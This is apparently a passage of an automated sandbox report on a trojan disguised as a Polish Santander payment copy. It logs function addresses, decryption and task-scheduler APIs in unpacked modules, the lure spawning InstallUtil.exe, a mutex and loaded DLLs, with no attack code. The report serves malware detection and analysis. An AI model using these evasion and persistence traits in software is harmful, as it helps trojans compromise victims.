                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DA87F110_2_04DA87F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DACB9010_2_04DACB90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DACBA010_2_04DACBA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DAD30810_2_04DAD308
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04EA73BC10_2_04EA73BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04EA5A0B10_2_04EA5A0B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1B14810_2_04F1B148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F17D2010_2_04F17D20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F104F010_2_04F104F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F124EC10_2_04F124EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F114B110_2_04F114B1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1045010_2_04F10450
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F135E110_2_04F135E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F125E410_2_04F125E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1258010_2_04F12580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1156110_2_04F11561
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1055210_2_04F10552
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1353210_2_04F13532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1253B10_2_04F1253B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1052110_2_04F10521
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F126F210_2_04F126F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F126C110_2_04F126C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F106BD10_2_04F106BD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1068E10_2_04F1068E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1363210_2_04F13632
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1163C10_2_04F1163C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1262410_2_04F12624
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1176D10_2_04F1176D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1075610_2_04F10756
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1173E10_2_04F1173E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1371610_2_04F13716
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F110E010_2_04F110E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F120EE10_2_04F120EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F100D210_2_04F100D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F120BD10_2_04F120BD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F100A810_2_04F100A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1206C10_2_04F1206C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1004010_2_04F10040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1804710_2_04F18047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1104E10_2_04F1104E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1101D10_2_04F1101D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F111EB10_2_04F111EB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F131DA10_2_04F131DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F131AB10_2_04F131AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1316910_2_04F13169
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1015E10_2_04F1015E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1014010_2_04F10140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1213D10_2_04F1213D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1112010_2_04F11120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1012210_2_04F10122
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F122D510_2_04F122D5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F112C210_2_04F112C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1D26210_2_04F1D262
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1122D10_2_04F1122D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1321A10_2_04F1321A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F133B710_2_04F133B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F113A010_2_04F113A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1039510_2_04F10395
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F11CFE10_2_04F11CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10CA910_2_04F10CA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F11CAF10_2_04F11CAF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F11C7E10_2_04F11C7E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F12C4D10_2_04F12C4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10C0910_2_04F10C09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F18D5010_2_04F18D50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10D5810_2_04F10D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F11D5B10_2_04F11D5B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F12D3010_2_04F12D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10ECF10_2_04F10ECF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F11E7C10_2_04F11E7C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10E6B10_2_04F10E6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10E0710_2_04F10E07
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10FB010_2_04F10FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10F5210_2_04F10F52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F11F2710_2_04F11F27
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F108EC10_2_04F108EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F128CC10_2_04F128CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1183810_2_04F11838
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1283F10_2_04F1283F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1081910_2_04F10819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F109ED10_2_04F109ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F129A310_2_04F129A3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F1295010_2_04F12950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10A5310_2_04F10A53
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F12A2110_2_04F12A21
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F11BE010_2_04F11BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F10BB410_2_04F10BB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F12B7710_2_04F12B77
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04F12B2710_2_04F12B27
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4651970.0.raw.unpack, DetailedChain.csCryptographic APIs: 'CreateDecryptor'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4651970.0.raw.unpack, IterableCompiler.csCryptographic APIs: 'CreateDecryptor'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4651970.0.raw.unpack, IterableCompiler.csCryptographic APIs: 'CreateDecryptor'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.5c70000.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.43c7a60.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4377a40.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.evad.winZIP@4/0@5/2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\5e7a81857a353068
                    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe "C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
